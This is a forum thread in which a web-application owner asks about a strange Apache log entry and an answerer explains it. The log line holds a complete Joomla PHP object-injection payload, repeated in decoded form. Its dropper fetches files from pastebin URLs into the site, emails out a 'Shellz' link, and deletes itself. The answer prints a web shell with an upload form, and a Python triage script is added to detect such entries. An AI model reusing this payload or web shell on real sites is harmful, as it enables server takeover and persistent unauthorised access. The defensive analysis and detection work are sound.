MySQL injection attempt - how to replicate from access.log?



I have recently been working on preventing SQL injection in my production Apache/PHP/MySQL web application.

To this end, I regularly go through the Apache access logs looking for unusual requests, and if they look strange I occasionally try to replicate them (does anyone have a better suggestion?).

Today I saw a strange entry in the access log. I can see that an HTTP referer is present, but I have no matching log entry for the original request. There is also no matching entry in the Apache error log, which implies it was "denied by server configuration".

Here is the strange log entry (base64 decoded):

169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] ."/libraries/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('

<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else 
echo "not exits";
echo "done .n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else 
echo "not exits2";
echo "done2 .n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "rn";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "rn" . php_uname() . "rn";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);

?>

')); fclose($fp); JFactory::getConfig(); exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0connection\";b:1;}\xf0\xfd\xfd\xfd">

I tried to replicate this GET request via Postman, but it was treated as an "invalid XMLHTTPRequest". I'm not sure how this is usually tested?

I'm also not sure what this does (or is trying to do). Any information/theories about what this is trying to do (and whether it succeeded) would be greatly appreciated.

My theory is that this is simply an attempt to inject SQL into some "framework" via the HTTP referer, but I'm no expert. Thanks in advance for any help.
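The log triage the question describes, as an added example that is not part of the original post: the script parses Apache combined-format lines, undoes the `\xHH` and `\"` escaping Apache applies when it logs header values, and reports which field (request, referer or user agent) carries a PHP serialized-object payload such as the `O:21:"JDatabaseDriverMysqli"` marker in the log line above. The sample lines and the indicator list are constructed here, not taken from the original log.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
_ESC_RE = re.compile(r'\\(x[0-9a-fA-F]{2}|.)')
# Header of a serialized PHP object, e.g. O:21:"JDatabaseDriverMysqli":3:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z_][A-Za-z0-9_\\]*":\d+:\{')
# PHP calls that have no business in a request header (assumed indicator list)
PHP_CODE_MARKERS = ('base64_decode(', 'fopen(', 'fwrite(', 'fclose(', '<?php')

def unescape_apache(field):
    # Undo Apache's escaping of logged header values: \" \\ \xHH and \n \r \t \0
    def repl(m):
        tok = m.group(1)
        if tok[0] == 'x':
            return chr(int(tok[1:], 16))
        return {'n': '\n', 'r': '\r', 't': '\t', '0': '\0'}.get(tok, tok)
    return _ESC_RE.sub(repl, field)

def classify_field(value):
    hits = []
    if PHP_OBJECT_RE.search(value):
        hits.append('php-serialized-object')
    if '\0' in value:
        hits.append('nul-bytes')  # serialized protected/private property names carry \0 markers
    if any(marker in value for marker in PHP_CODE_MARKERS):
        hits.append('php-code')
    return hits

def triage_line(line):
    # None if the line is not combined format, else host/time/status and the indicators per field
    m = COMBINED_RE.match(line.rstrip('\n'))
    if not m:
        return None
    fields = {k: unescape_apache(v) for k, v in m.groupdict().items()}
    findings = {n: h for n in ('request', 'referer', 'agent') if (h := classify_field(fields[n]))}
    return {'host': fields['host'], 'time': fields['time'], 'status': fields['status'], 'findings': findings}

def suspicious_entries(lines):
    return [r for r in map(triage_line, lines) if r and r['findings']]

# Constructed sample lines: an ordinary browser hit, then one carrying a serialized object in the User-Agent field
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Mar/2017:04:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "https://example.test/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" '
    '"}__test|O:21:\\"JDatabaseDriverMysqli\\":1:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}}\\xf0\\xfd\\xfd\\xfd"',
]
```

Running `suspicious_entries(SAMPLE_LOG)` reports only the second line, with the finding on the `agent` field and none on `referer`, which is the field the question suspects.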

Here is what I got when I decoded it:

<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else 
echo "not exits";
echo "done .n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else 
echo "not exits2";
echo "done2 .n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);

It looks like you are using Joomla CMS. There is a file inside the libraries folder, lol.php, which the script is calling. Another file, /libraries/joomla/wl.php, is also a malicious file being called. In addition, the pastebin code is being executed:

<?php 
// name of the file is: i (it has no extension)
error_reporting(0);
if(isset($_GET["0"]))
{
echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';
echo 'uname:'.php_uname()."n";
echo getcwd() . "n";
?>

It is writing the pastebin code to your file /libraries/joomla/jmail.php.

Conclusion:

If you are not using Joomla CMS, there is nothing to worry about. If you are, you need to check those affected files. Malicious files may have been uploaded to your server.
